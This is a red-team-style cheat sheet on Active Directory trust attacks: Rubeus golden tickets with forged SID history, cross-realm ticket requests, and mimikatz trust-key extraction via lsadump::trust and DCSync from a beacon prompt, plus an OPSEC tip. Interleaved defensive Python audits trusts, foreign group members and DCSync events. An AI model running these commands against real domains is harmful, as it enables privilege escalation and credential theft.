In Active Directory, a trust allows users in one domain to access resources in other domains.

Enumeration

Enumerate the trusts of the current domain (use -Domain [fqdn] to enumerate other domains, e.g. the parent domain):

# PowerSploit
# SourceName domain trusts TargetName domain
Get-DomainTrust

Trust Traits

  • Direction: A trust can be one-way or two-way. In a one-way trust where domain A trusts domain B, users in B can access resources in A; A has an outbound trust and B has an inbound trust. A two-way (bidirectional) trust is equivalent to two one-way trusts in opposite directions.
  • Transitivity: If a trust is transitive, it can be chained with other trusts. For example, if A transitively trusts B and B transitively trusts C, then A trusts C, and users in C can access resources in A.

Parent-child Two-way Trusts

Parent and child domains have two-way transitive trusts between them.

A child domain admin can be elevated to parent domain admin by adding fake SID history to a golden ticket (SID history was originally intended for migrating users between domains, by recording the SIDs from the old domain on the account in the new domain):

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:[krbtgt-hash-b64] /user:Administrator /domain:[child-domain-fqdn] /sid:[child-domain-sid] /sids:[parent-domain-admins-group-sid] /nowrap

Import the ticket to access the parent DC.

The same trick (/sids: for group SID history) applies to diamond tickets. Specify 500 (Administrator) for the ticket user RID and 519 for the group RID.
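The direction and transitivity rules from the Trust Traits section, and the SID-history condition that the parent-child golden ticket step relies on, can both be checked mechanically from the fields Get-DomainTrust returns. The script below is an added example written for this page, not code from PowerSploit or Rubeus. The trust records are constructed to resemble Get-DomainTrust output with hypothetical domain names, and the constants are the MS-ADTS trustDirection and trustAttributes values. It builds the trust graph with the page's convention (A trusts B means users in B can reach resources in A), lists every domain whose users can reach a given domain's resources while chaining only through transitive trusts, and reports per trust whether SID history from the trusted side is honoured, which is what makes the /sids: trick work inside a forest and what SID filtering (the quarantine bit) stops on external trusts.

```python
"""Trust direction, transitivity and SID-filtering model (added example; the
records are constructed, not real Get-DomainTrust output)."""
from collections import defaultdict, deque

# trustDirection values (MS-ADTS), seen from SourceName
TRUST_DIRECTION_INBOUND = 1        # TargetName trusts SourceName
TRUST_DIRECTION_OUTBOUND = 2       # SourceName trusts TargetName
TRUST_DIRECTION_BIDIRECTIONAL = 3  # both bits set

# trustAttributes flags (MS-ADTS)
TRUST_ATTRIBUTE_NON_TRANSITIVE = 0x01
TRUST_ATTRIBUTE_QUARANTINED_DOMAIN = 0x04  # SID filtering quarantine enabled
TRUST_ATTRIBUTE_FOREST_TRANSITIVE = 0x08
TRUST_ATTRIBUTE_WITHIN_FOREST = 0x20       # parent-child or tree-root trust

# Constructed sample records with the fields Get-DomainTrust returns.
# Hypothetical domains: dev.corp.local is a child of corp.local; partner.example
# and legacy.example are external trusts; acme.example is a forest trust.
TRUSTS = [
    {"SourceName": "dev.corp.local", "TargetName": "corp.local",
     "TrustDirection": TRUST_DIRECTION_BIDIRECTIONAL, "TrustAttributes": 0x20},
    {"SourceName": "corp.local", "TargetName": "partner.example",
     "TrustDirection": TRUST_DIRECTION_OUTBOUND, "TrustAttributes": 0x05},
    {"SourceName": "corp.local", "TargetName": "legacy.example",
     "TrustDirection": TRUST_DIRECTION_INBOUND, "TrustAttributes": 0x01},
    {"SourceName": "corp.local", "TargetName": "acme.example",
     "TrustDirection": TRUST_DIRECTION_BIDIRECTIONAL, "TrustAttributes": 0x08},
]


def build_trust_graph(records):
    """Map trusting domain -> {trusted domain: transitive?}. Page convention:
    'A trusts B' means users in B can reach resources in A."""
    graph = defaultdict(dict)
    for r in records:
        src, dst = r["SourceName"].lower(), r["TargetName"].lower()
        transitive = not (r["TrustAttributes"] & TRUST_ATTRIBUTE_NON_TRANSITIVE)
        if r["TrustDirection"] & TRUST_DIRECTION_OUTBOUND:  # Source trusts Target
            graph[src][dst] = transitive
        if r["TrustDirection"] & TRUST_DIRECTION_INBOUND:   # Target trusts Source
            graph[dst][src] = transitive
    return graph


def domains_with_access_to(resource_domain, graph):
    """Every domain whose users can reach resources in resource_domain.
    The first hop may be any trust; later hops require every hop transitive."""
    start = resource_domain.lower()
    best = {}  # domain -> True if reached over an all-transitive chain
    queue = deque([(start, True)])
    while queue:
        domain, chain_ok = queue.popleft()
        for trusted, transitive in graph.get(domain, {}).items():
            if trusted == start:
                continue
            if domain != start and not (chain_ok and transitive):
                continue  # a non-transitive hop ends the chain here
            new_ok = chain_ok and transitive
            if trusted in best and (best[trusted] or not new_ok):
                continue  # already reached at least as well
            best[trusted] = new_ok
            queue.append((trusted, new_ok))
    return set(best)


def sid_history_verdict(attrs):
    """Is SID history from the trusted side honoured across this trust?"""
    if attrs & TRUST_ATTRIBUTE_WITHIN_FOREST:
        return "intra-forest: SID history is not filtered"
    if attrs & TRUST_ATTRIBUTE_QUARANTINED_DOMAIN:
        return "quarantined: SID filtering enabled"
    if attrs & TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
        return "forest trust: SIDs from outside the trusted forest are filtered"
    return "external trust without quarantine: SID history accepted"


def audit_trusts(records):
    """One (source, target, verdict) tuple per record."""
    return [(r["SourceName"], r["TargetName"], sid_history_verdict(r["TrustAttributes"]))
            for r in records]


if __name__ == "__main__":
    g = build_trust_graph(TRUSTS)
    for d in ("corp.local", "dev.corp.local", "legacy.example"):
        print(d, "<-", sorted(domains_with_access_to(d, g)))
    for row in audit_trusts(TRUSTS):
        print(*row)
```

The model treats any trust without the NON_TRANSITIVE bit as fully transitive; a real forest trust is transitive only between the two forests, so chaining a forest trust onward into a third forest's trusts would overstate reach. The intra-forest verdict is the defender's reminder that the forest, not the domain, is the security boundary: a compromised child domain is a compromised forest.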

Other ideas for exploiting trusts without domain admin:

  • Kerberoast or AS-REP roasting across trusts.
  • Capture TGTs of parent domain principals that authenticate to compromised child domain machines configured for unconstrained delegation.
  • Impersonate an RDP session from the parent domain.

One-way trusts

Inbound

Attack Overview

  • Goal: obtain access to foreign domain
  • Requirements: existing inbound trust

First find the trusting foreign domain with Get-DomainTrust.

To actually exploit the trust, we must find a group in the foreign domain containing members from the current domain:

# PowerSploit
Get-DomainForeignGroupMember -Domain [foreign-domain]
ConvertFrom-SID [member-name-sid]

After compromising a member of such a group (and assuming the group has admin privileges in the foreign domain), we can exploit the trust and gain access to the foreign domain's DC.
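The same finding that Get-DomainForeignGroupMember followed by ConvertFrom-SID produces can be computed from an exported group listing, which is how a defender audits the trusting side for exactly the exposure described above. The Python below is an added example for this page, not code from PowerSploit: it splits each member SID into domain prefix and RID, reports members whose prefix differs from the group's own domain, resolves the prefix back to a domain name, and marks whether the group is one of the admin-level groups the paragraph is concerned with. All SIDs, domain names and memberships are constructed.

```python
"""Foreign group membership audit (added example with constructed data)."""
import re

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# Groups whose membership grants admin rights in a domain (hypothetical subset)
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed domain SIDs (not real)
DOMAIN_SIDS = {
    "partner.example": "S-1-5-21-1111111111-2222222222-3333333333",
    "corp.local": "S-1-5-21-4444444444-5555555555-6666666666",
}

# Constructed membership listing, as a defender would export it per domain
GROUPS = [
    {"GroupName": "Administrators", "GroupDomain": "partner.example",
     "MemberSIDs": [DOMAIN_SIDS["partner.example"] + "-500",
                    DOMAIN_SIDS["corp.local"] + "-1105"]},
    {"GroupName": "Helpdesk", "GroupDomain": "partner.example",
     "MemberSIDs": [DOMAIN_SIDS["partner.example"] + "-1201",
                    DOMAIN_SIDS["corp.local"] + "-1106",
                    "S-1-5-11"]},  # Authenticated Users: well-known SID, skipped
    {"GroupName": "Domain Admins", "GroupDomain": "corp.local",
     "MemberSIDs": [DOMAIN_SIDS["corp.local"] + "-500"]},
]


def split_sid(sid):
    """(domain prefix, RID) for a domain SID; None for built-in/well-known SIDs."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else None


def domain_for_sid_prefix(prefix, domain_sids=DOMAIN_SIDS):
    """Reverse lookup of a domain SID prefix to its name (ConvertFrom-SID's job)."""
    for name, sid in domain_sids.items():
        if sid == prefix:
            return name
    return "unknown-domain"


def foreign_group_members(groups, domain_sids=DOMAIN_SIDS):
    """Members whose SID belongs to a different domain than the group itself."""
    findings = []
    for g in groups:
        home = domain_sids[g["GroupDomain"]]
        for member in g["MemberSIDs"]:
            parts = split_sid(member)
            if parts is None or parts[0] == home:
                continue
            findings.append({
                "Group": g["GroupName"],
                "GroupDomain": g["GroupDomain"],
                "MemberSID": member,
                "MemberDomain": domain_for_sid_prefix(parts[0], domain_sids),
                "MemberRID": parts[1],
                "Privileged": g["GroupName"] in PRIVILEGED_GROUPS,
            })
    return findings


if __name__ == "__main__":
    for f in foreign_group_members(GROUPS):
        flag = "ADMIN" if f["Privileged"] else "     "
        print(f"{flag} {f['GroupDomain']}\\{f['Group']} <- {f['MemberDomain']} RID {f['MemberRID']}")
```

The privileged flag is the item to act on: a foreign principal in an admin-level group means a compromise anywhere in the trusted domain becomes a compromise of the trusting one, so those memberships should be justified or removed, and nested groups should be expanded before the check is run.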

OPSEC note

All inter-realm tickets use rc4_hmac by default regardless of the original TGT encryption algorithm, so do not be alarmed when you see rc4.

# Get TGT
Rubeus.exe asktgt /user:[target-user] /domain:[current-domain] /aes256:[hash] /nowrap
# Request inter-realm ticket
Rubeus.exe asktgs /service:krbtgt/[foreign-domain-fqdn] /domain:[current-domain-fqdn] /dc:[current-domain-dc-fqdn] /ticket:[tgt-base64] /nowrap
# Obtain CIFS TGS with the inter-realm ticket
Rubeus.exe asktgs /service:cifs/[foreign-domain-dc-fqdn] /domain:[current-domain-fqdn] /dc:[foreign-domain-dc-fqdn] /ticket:[inter-realm-base64] /nowrap

Outbound

Outbound trusts can still be exploited to gain regular user access on the trusted domain by obtaining the shared trust credentials. The shared credentials can be used to authenticate as an account on the trusted domain named TrustingDomainName$.

Two methods may be used to obtain the shared credential:

Method 1: memory patching (risky)

beacon> mimikatz lsadump::trust

Method 2: DCSync

# Get the GUID of TDO (trusted domain object)
beacon> powershell Get-DomainObject -Identity "CN=[foreign-domain-fqdn],CN=System,[DC=[current-domain-fqdn]...]" | select objectGuid
# Get shared keys from GUID
# [Out] = latest keys
# [Out-n] = n-th key history
beacon> mimikatz @lsadump::dcsync /domain:[current-domain-fqdn] /guid:{[tdo-guid]}
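Method 2 leaves a footprint on the domain controller: when the domain naming context's SACL audits the replication control-access rights and Directory Service Access auditing is enabled, each replication request is logged as event 4662 carrying the DS-Replication-Get-Changes GUIDs, and a DCSync is one of those requests coming from a principal that is not a domain controller. The detection logic below is an added example, not part of this page or of any product; the event lines are constructed and flattened into key=value form, and the allow-list of expected replicators is hypothetical.

```python
"""DCSync footprint detection over 4662 events (added example; constructed events)."""
import re

# Control-access rights a replication request exercises (AD schema GUIDs)
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL,
                      DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET}

# Principals allowed to replicate; hypothetical allow-list for this example
EXPECTED_REPLICATORS = {"DC01$", "DC02$"}

# Constructed security events flattened to key=value pairs (not real log output);
# Properties lists the GUIDs of the rights that were exercised.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ SubjectDomainName=CORP AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jdoe SubjectDomainName=CORP AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # the same user reading an unrelated property (placeholder GUID, not a real right)
    "EventID=4662 SubjectUserName=jdoe SubjectDomainName=CORP AccessMask=0x10 "
    "Properties={00000000-0000-0000-0000-000000000000}",
    "EventID=4624 SubjectUserName=jdoe SubjectDomainName=CORP LogonType=3",
]

KV_RE = re.compile(r"(\w+)=(\S+)")
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def parse_event(line):
    """Turn one flattened event line into a dict; all braced GUIDs end up in 'Rights'."""
    event = dict(KV_RE.findall(line))
    event["Rights"] = {g.lower() for g in GUID_RE.findall(line)}
    return event


def is_replication_request(event):
    """A 4662 whose exercised rights include any replication right."""
    return event.get("EventID") == "4662" and bool(event["Rights"] & REPLICATION_RIGHTS)


def detect_dcsync(lines, expected=EXPECTED_REPLICATORS):
    """Replication requests from principals outside the allow-list."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_replication_request(event) and event.get("SubjectUserName") not in expected:
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in detect_dcsync(SAMPLE_EVENTS):
        print("possible DCSync:", hit["SubjectDomainName"] + "\\" + hit["SubjectUserName"],
              sorted(hit["Rights"] & REPLICATION_RIGHTS))
```

Alert on the principal, not on the right alone: DC computer accounts and directory synchronisation service accounts (the Azure AD Connect account, for instance) replicate legitimately and belong on the allow-list, while a replication request from an ordinary user account, as in the second sample line, is the thing to investigate. Without the SACL and audit subcategory in place the 4662 never fires, so verifying that the audit policy is actually deployed is part of the detection.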

With the key, we can obtain a TGT for TrustingDomainName$ on the trusted domain. As usual, RC4 is used by default for inter-realm tickets.

Rubeus.exe asktgt /user:CYBER$ /domain:msp.org /rc4:[key-base64] /nowrap

Although no additional privilege is obtained with this attack, it does open up a lot more attack opportunities.